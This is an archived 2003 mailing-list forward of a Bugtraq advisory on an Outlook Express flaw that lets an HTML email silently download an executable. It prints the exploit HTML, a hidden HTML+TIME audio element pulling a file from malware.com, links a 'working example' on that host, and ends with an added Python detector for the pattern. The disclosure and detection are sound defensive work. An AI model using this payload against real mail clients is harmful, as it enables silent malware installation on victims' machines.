Page last updated:
2003 May 21 18:34

The following is an archive of a post made to our 'vox mailing list' by one of its subscribers.

[vox] OT: [Fwd: Restricted Zone: the OUTLOOK EXPRESS]

Yet another reason to avoid MS products like "Look Out!" Express.



---------------------------- Original Message ----------------------------
Subject: Restricted Zone: the OUTLOOK EXPRESS
From:    "http-equiv@excite.com" <1@malware.com>
Date:    Wed, May 21, 2003 4:55
To:      bugtraq@securityfocus.com
         NTBugtraq@listserv.ntbugtraq.com
--------------------------------------------------------------------------



Tuesday, 20 May, 2003


Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup post.

This can be achieved with the default setting of Outlook Express: 
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work.  But
it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf";  />
</body></html>

What that does is invoke our freakish media file including our trusty and
battle-hardened 0s URL flip from within the html of an email or newsgroup
post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according to
plan. Specifically audio + *.asf. Our 0s URL flip points to our file on
the remote server and automatically forces our download as instructed.
Couple that with the most recent flood-like functionality of the iframe:
http://www.securityfocus.com/archive/1/321662 and
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip


Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability':
http://www.securityfocus.com/bid/4343 which appears to never have been
patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from
untrustworthy sources


End Call


-- 
http://www.malware.com





_______________________________________________
vox mailing list
vox@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox
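A defender-side check for the pattern the forwarded post describes (an HTML+TIME `behavior:url(#default#time)` style bound to a namespace prefix, plus a namespaced media element whose src points at a remote file) run over a MIME message, written here as an added example; it is not code from the post or from LUGOD, and the sample messages and hostnames are constructed.

```python
import email
import re
from email import policy

# Patterns for the HTML+TIME technique shown in the post: the default#time
# behaviour bound via a stylesheet, plus a namespaced media element.
TIME_BEHAVIOR = re.compile(r"behavior\s*:\s*url\(\s*#default#time2?\s*\)", re.I)
XMLNS_PREFIX = re.compile(r"xmlns:([A-Za-z_][\w.-]*)")
MEDIA_TAGS = "audio|video|media|img|animation"
SRC_ATTR = re.compile(r"(?:[\w.-]+:)?src\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def find_html_time_media(raw_message: str) -> list[dict]:
    """Return one finding per namespaced media element in a text/html part
    whose stylesheet also binds the #default#time behaviour."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        if not TIME_BEHAVIOR.search(html):
            continue  # no time behaviour bound: not this pattern
        for prefix in set(XMLNS_PREFIX.findall(html)):
            tag_re = re.compile(rf"<{re.escape(prefix)}:({MEDIA_TAGS})\b([^>]*)>", re.I)
            for m in tag_re.finditer(html):
                src = SRC_ATTR.search(m.group(2))
                findings.append({
                    "element": f"{prefix}:{m.group(1).lower()}",
                    "src": src.group(1) if src else None,
                    "hidden": bool(re.search(r"display\s*:\s*none", html, re.I)),
                })
    return findings


# Constructed sample modelled on the post's message (hostname is a placeholder).
SAMPLE_MESSAGE = r"""MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: constructed sample

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://media.example.invalid/sample.asf" />
</body></html>
"""

# Constructed benign HTML mail that must not be flagged.
BENIGN_MESSAGE = """MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>Meeting is at 7pm.</p></body></html>
"""

if __name__ == "__main__":
    for f in find_html_time_media(SAMPLE_MESSAGE):
        print(f"flag: {f['element']} src={f['src']} hidden={f['hidden']}")
```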
